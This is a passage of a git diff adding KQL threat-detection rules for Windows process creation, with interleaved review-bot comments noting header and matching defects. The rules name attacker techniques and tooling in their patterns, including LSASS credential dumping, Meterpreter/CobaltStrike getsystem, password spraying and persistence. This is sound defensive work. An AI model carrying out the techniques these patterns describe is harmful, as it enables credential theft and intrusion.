+| where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql
new file mode 100644
index 00000000..f4b66630
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Potential Encoded PowerShell Patterns In CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: low
+// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
new file mode 100644
index 00000000..f21b7efb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
+// Author: Aaron Stratton
+// Date: 2023-11-13
+// Level: high
+// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.t1021.003, attack.lateral-movement
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql
new file mode 100644
index 00000000..5c2e7cfe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql
@@ -0,0 +1,13 @@
+// Title: Potential Execution of Sysinternals Tools
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+// - Legitimate use of SysInternals tools
+// - Programs that use the same command line flag
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql
new file mode 100644
index 00000000..540371d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql
@@ -0,0 +1,12 @@
+// Title: Potential Fake Instance Of Hxtsr.EXE Executed
+// Author: Sreeman
+// Date: 2020-04-17
+// Level: medium
+// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
+// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
+// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql
new file mode 100644
index 00000000..64e50595
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql
@@ -0,0 +1,11 @@
+// Title: Potential File Download Via MS-AppInstaller Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
+// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..c52573fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql
@@ -0,0 +1,10 @@
+// Title: Potential File Overwrite Via Sysinternals SDelete
+// Author: frack113
+// Date: 2021-06-03
+// Level: high
+// Description: Detects the use of SDelete to erase a file not the free space
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
new file mode 100644
index 00000000..52c4e4bb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql
new file mode 100644
index 00000000..4f75e317
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql
@@ -0,0 +1,14 @@
+// Title: Potential Homoglyph Attack Using Lookalike Characters
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql
new file mode 100644
index 00000000..10d4e84c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql
@@ -0,0 +1,12 @@
+// Title: Potential Lateral Movement via Windows Remote Shell
+// Author: Liran Ravich
+// Date: 2025-10-22
+// Level: medium
+// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+// False Positives:
+// - Legitimate use of WinRM within the organization
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql
new file mode 100644
index 00000000..0a5e2204
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential LethalHTA Technique Execution
+// Author: Markus Neis
+// Date: 2018-06-07
+// Level: high
+// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql
new file mode 100644
index 00000000..a5aa6c57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql
@@ -0,0 +1,16 @@
+// Title: Potential LSASS Process Dump Via Procdump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-10-30
+// Level: high
+// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
+// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
+// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
+// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
+// False Positives:
+// - Unlikely, because no one should dump an lsass process memory
+// - Another tool that uses command line flags similar to ProcDump
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
new file mode 100644
index 00000000..178f8a80
--- /dev/null
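Review bot: The `// MITRE Tactic: Defense Evasion` header in the ProcDump hunk appears to be taken from the first entry of the Tags line rather than from the rule's subject; the rule is about LSASS credential dumping and carries `attack.credential-access` / `attack.t1003.001`, so a reader who only skims the header gets the wrong tactic. The same pattern shows in the Mpclient hunk (`Privilege Escalation` for a sideloading rule) and the Run Keys hunk (`Privilege Escalation` for a persistence rule). Since these files look generated, consider having the converter emit every tactic tag, e.g. `// MITRE Tactic: Defense Evasion, Credential Access`, instead of only the first one.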
+++ b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Manage-bde.wsf Abuse To Proxy Execution
+// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: high
+// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql
new file mode 100644
index 00000000..9efe4f59
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Potential Memory Dumping Activity Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of LiveKD based on PE metadata or image name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Administration and debugging activity (must be investigated)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql
new file mode 100644
index 00000000..f77d2325
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Meterpreter/CobaltStrike Activity
+// Author: Teymur Kheirkhabarov, Ecco, Florian Roth
+// Date: 2019-10-26
+// Level: high
+// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002
+// False Positives:
+// - Commandlines containing components like cmd accidentally
+// - Jobs and services started with cmd
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql
new file mode 100644
index 00000000..bc7060f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mftrace.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+// - Legitimate use for tracing purposes
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
new file mode 100644
index 00000000..41ff65ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries
+// Author: Bhabesh Raj
+// Date: 2022-08-01
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql
new file mode 100644
index 00000000..4528084c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql
@@ -0,0 +1,10 @@
+// Title: Potential MsiExec Masquerading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-14
+// Level: high
+// Description: Detects the execution of msiexec.exe from an uncommon directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql
new file mode 100644
index 00000000..5712cb83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential MSTSC Shadowing Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-24
+// Level: high
+// Description: Detects RDP session hijacking by using MSTSC shadowing
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql
new file mode 100644
index 00000000..7790f853
--- /dev/null
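Review bot: In the msiexec-masquerading hunk, `ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe"` compares a bare file-name field against a value with a leading backslash, so that branch can never match and the rule effectively only fires on the `FolderPath endswith` test; a renamed copy of the binary, which is the case the OriginalFileName clause exists for, is therefore missed. The neighbouring sdelete, certutil and rundll32 hunks compare OriginalFileName without a path separator, so the consistent fix is `ProcessVersionInfoOriginalFileName =~ "msiexec.exe"`. If the backslash is carried over from the upstream Sigma selection, the correction belongs in the converter or upstream rather than in this generated file.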
+++ b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql
@@ -0,0 +1,14 @@
+// Title: Potential Network Sniffing Activity Using Network Tools
+// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
+// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1040
+// False Positives:
+// - Legitimate administration activity to troubleshoot network issues
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql
new file mode 100644
index 00000000..75328785
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential NTLM Coercion Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql
new file mode 100644
index 00000000..468f6209
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: Potential Obfuscated Ordinal Call Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql
new file mode 100644
index 00000000..25d2e033
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Password Spraying Attempt Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects possible password spraying attempts using Dsacls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate use of dsacls to bind to an LDAP session
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql
new file mode 100644
index 00000000..247d9a52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Attempt Via Existing Service Tampering
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
new file mode 100644
index 00000000..81b5797b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
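Review bot: `ProcessCommandLine contains ".bin$"`, `".msh$"` and `".reg$"` in the service-tampering hunk test for a literal dollar sign; `contains` is a plain substring match and `$` is not an end-of-string anchor in it, so those three extensions are dead entries in the list. Every other extension in the same list (`.sh`, `.exe`, `.dll`, ...) is written without an anchor, so the consistent form is `".bin"`, `".msh"`, `".reg"`. If the `$` is present in the upstream Sigma list, the converter is faithfully reproducing an upstream defect and the change belongs there; otherwise the converter is leaving a regex anchor in a `contains` term and should strip it.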
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-06-28
+// Level: medium
+// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+// - Legitimate administrator sets up autorun keys for legitimate reasons.
+// - Discord
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run") and (ProcessCommandLine contains "reg" and ProcessCommandLine contains " add ") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql
new file mode 100644
index 00000000..71bd8e83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_via_logon_scripts_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potential Persistence Via Logon Scripts - CommandLine
+// Author: Tom Ueltschi (@c_APT_ure)
+// Date: 2019-01-12
